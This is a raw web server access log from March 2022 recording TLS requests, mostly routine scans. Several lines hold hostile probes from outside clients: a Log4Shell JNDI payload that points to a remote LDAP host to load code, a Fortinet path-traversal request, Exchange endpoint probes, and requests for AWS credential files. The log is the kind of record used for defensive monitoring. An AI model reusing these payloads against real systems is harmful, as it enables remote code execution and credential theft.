[04/Mar/2022:01:12:50 +0100] 54.213.196.157 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295 [04/Mar/2022:01:12:53 +0100] 54.200.129.106 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295 [04/Mar/2022:01:13:27 +0100] 34.212.220.96 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295 [04/Mar/2022:01:13:54 +0100] 34.212.220.96 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295 [04/Mar/2022:01:27:54 +0100] 66.63.177.190 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383 [04/Mar/2022:01:30:56 +0100] 34.77.162.14 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 385 [04/Mar/2022:03:24:48 +0100] 128.1.248.42 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301 [04/Mar/2022:03:43:47 +0100] 167.248.133.62 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383 [04/Mar/2022:03:43:47 +0100] 167.248.133.62 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [04/Mar/2022:03:43:48 +0100] 167.248.133.62 TLSv1.2 AES256-SHA "PRI * HTTP/2.0" 379 [04/Mar/2022:04:32:12 +0100] 192.241.218.136 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348 [04/Mar/2022:04:36:39 +0100] 192.241.219.72 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 335 [04/Mar/2022:04:54:38 +0100] 131.220.6.152 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 295 [04/Mar/2022:05:53:59 +0100] 94.232.45.12 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [04/Mar/2022:06:21:11 +0100] 183.136.226.3 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383 [04/Mar/2022:06:33:52 +0100] 34.140.248.32 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 301 [04/Mar/2022:07:03:57 +0100] 128.14.141.34 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301 [04/Mar/2022:07:18:43 +0100] 207.46.13.233 TLSv1.2 AES256-SHA "GET /robots.txt HTTP/1.1" 311 [04/Mar/2022:07:18:45 +0100] 207.46.13.233 TLSv1.2 AES256-SHA "GET /robots.txt HTTP/1.1" 311 [04/Mar/2022:07:18:51 +0100] 157.55.39.47 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 304 [04/Mar/2022:08:20:27 +0100] 95.173.160.160 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.aws/credentials HTTP/1.1" 304 [04/Mar/2022:08:20:28 +0100] 95.173.160.160 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /.aws/credentials HTTP/1.1" 304 [04/Mar/2022:08:39:17 +0100] 178.73.215.171 TLSv1.2 AES256-SHA "GET / HTTP/1.0" 388 [04/Mar/2022:08:39:40 +0100] 178.73.215.171 - - "-" - [04/Mar/2022:08:39:41 +0100] 178.73.215.171 - - "-" - [04/Mar/2022:08:59:54 +0100] 80.82.77.33 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383 [04/Mar/2022:08:59:56 +0100] 80.82.77.33 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379 [04/Mar/2022:08:59:56 +0100] 80.82.77.33 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379 [04/Mar/2022:08:59:56 +0100] 80.82.77.33 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379 [04/Mar/2022:09:00:00 +0100] 80.82.77.33 TLSv1.2 AES256-SHA "quit" 379 [04/Mar/2022:09:00:00 +0100] 80.82.77.33 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 393 [04/Mar/2022:09:00:00 +0100] 80.82.77.33 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /sitemap.xml HTTP/1.1" 394 [04/Mar/2022:09:00:00 +0100] 80.82.77.33 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.well-known/security.txt HTTP/1.1" 407 [04/Mar/2022:09:00:00 +0100] 80.82.77.33 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /favicon.ico HTTP/1.1" 309 [04/Mar/2022:09:00:01 +0100] 80.82.77.33 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379 [04/Mar/2022:09:01:19 +0100] 45.134.144.144 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET ///remote/fgt_lang?lang=/../../../..//////////dev/ HTTP/1.1" 325 [04/Mar/2022:09:17:06 +0100] 34.86.35.13 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 393 [04/Mar/2022:10:49:45 +0100] 192.53.170.163 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301 [04/Mar/2022:12:15:56 +0100] 128.1.248.26 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301 [04/Mar/2022:12:49:33 +0100] 23.90.160.114 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301 [04/Mar/2022:13:59:10 +0100] 52.70.76.87 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 301 [04/Mar/2022:14:15:20 +0100] 34.77.162.25 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 377 [04/Mar/2022:14:21:47 +0100] 167.94.138.45 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383 [04/Mar/2022:14:21:47 +0100] 167.94.138.45 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [04/Mar/2022:14:21:48 +0100] 167.94.138.45 TLSv1.2 AES256-SHA "PRI * HTTP/2.0" 379 [04/Mar/2022:18:20:23 +0100] 182.253.115.229 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /${jndi:ldap://115.28.134.231:1389/Exploit} HTTP/1.1" 429 [04/Mar/2022:18:20:23 +0100] 182.253.115.229 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383 [04/Mar/2022:18:20:24 +0100] 182.253.115.229 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /login HTTP/1.1" 388 [04/Mar/2022:18:20:25 +0100] 182.253.115.229 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383 [04/Mar/2022:19:44:38 +0100] 128.14.141.34 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301 [04/Mar/2022:19:58:17 +0100] 92.118.160.17 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 377 [04/Mar/2022:20:23:37 +0100] 157.55.39.47 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 304 [04/Mar/2022:20:32:23 +0100] 92.118.160.13 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 393 [04/Mar/2022:21:01:16 +0100] 195.154.45.158 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [04/Mar/2022:21:01:16 +0100] 195.154.45.158 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 309 [04/Mar/2022:21:57:10 +0100] 193.118.53.210 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301 [04/Mar/2022:22:12:09 +0100] 156.146.50.188 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "OPTIONS / HTTP/1.1" 301 [05/Mar/2022:00:05:33 +0100] 106.75.146.12 TLSv1.2 AES256-SHA "GET / HTTP/1.0" 383